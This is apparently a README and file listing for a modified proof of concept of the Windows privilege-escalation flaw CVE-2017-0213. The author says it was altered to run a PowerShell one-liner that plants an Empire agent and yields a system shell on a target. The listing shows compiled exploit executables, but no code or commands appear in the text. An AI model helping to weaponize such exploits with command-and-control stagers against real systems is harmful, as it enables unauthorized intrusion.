A version of CVE-2017-0213 that I plan to use with an Empire stager### CVE-2017-0213
I used the code provided by the Google Project Zero Team here: https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
The changes I made allow the program to call a powershell oneliner that will give me an Empire agent on the target.
I will use this for privilege escalation through Empire.
I know it is not a powershell/python script so it kind of ruins the spirit of Empire... but oh well; it gets me a system shell which I like :)
[4.0K] /data/pocs/f0da068256a57fe98048c529b26c8135cb69ab9a
├── [4.0K] CVE-2017-0213
│ ├── [ 29K] CVE-2017-0213.cpp
│ ├── [4.1K] CVE-2017-0213.vcxproj
│ ├── [ 996] CVE-2017-0213.vcxproj.filters
│ ├── [4.0K] Debug
│ │ ├── [ 147] CVE-2017-0213.log
│ │ ├── [351K] CVE-2017-0213.obj
│ │ ├── [4.0K] CVE-2017-0213.tlog
│ │ │ ├── [ 910] CL.command.1.tlog
│ │ │ ├── [ 46K] CL.read.1.tlog
│ │ │ ├── [ 856] CL.write.1.tlog
│ │ │ ├── [ 246] CVE-2017-0213.lastbuildstate
│ │ │ ├── [1.5K] link.command.1.tlog
│ │ │ ├── [4.1K] link.read.1.tlog
│ │ │ └── [ 816] link.write.1.tlog
│ │ ├── [939K] vc141.idb
│ │ └── [724K] vc141.pdb
│ └── [4.0K] Release
│ ├── [ 404] CVE-2017-0213.log
│ ├── [1.1M] CVE-2017-0213.obj
│ ├── [4.0K] CVE-2017-0213.tlog
│ │ ├── [ 930] CL.command.1.tlog
│ │ ├── [ 45K] CL.read.1.tlog
│ │ ├── [ 656] CL.write.1.tlog
│ │ ├── [ 248] CVE-2017-0213.lastbuildstate
│ │ ├── [2.4K] CVE-2017-0213.write.1u.tlog
│ │ ├── [1.5K] link.command.1.tlog
│ │ ├── [4.2K] link.read.1.tlog
│ │ └── [ 432] link.write.1.tlog
│ └── [484K] vc141.pdb
├── [1.1K] CVE-2017-0213.sln
├── [4.0K] Debug
│ ├── [134K] CVE-2017-0213.exe
│ ├── [722K] CVE-2017-0213.ilk
│ └── [868K] CVE-2017-0213.pdb
├── [ 468] README.md
└── [4.0K] Release
├── [142K] CVE-2017-0213.exe
├── [380K] CVE-2017-0213.iobj
└── [ 92K] CVE-2017-0213.ipdb
7 directories, 33 files